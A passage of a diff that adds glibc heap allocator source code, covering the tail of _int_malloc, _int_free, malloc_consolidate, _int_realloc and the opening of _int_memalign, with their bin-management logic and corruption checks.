+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (chunksize_nomask (victim)
+				   > av->system_mem, 0))
+            malloc_printerr ("malloc(): memory corruption");
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+
+    if (tcache
+	&& tc_idx < mp_.tcache_bins
+	&& tcache->counts[tc_idx] < mp_.tcache_count)
+      {
+	tcache_put (p, tc_idx);
+	return;
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  unlink(av, p, bck, fwd);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink(av, nextchunk, bck, fwd);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Check for overflow.  */
+  if (nb > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
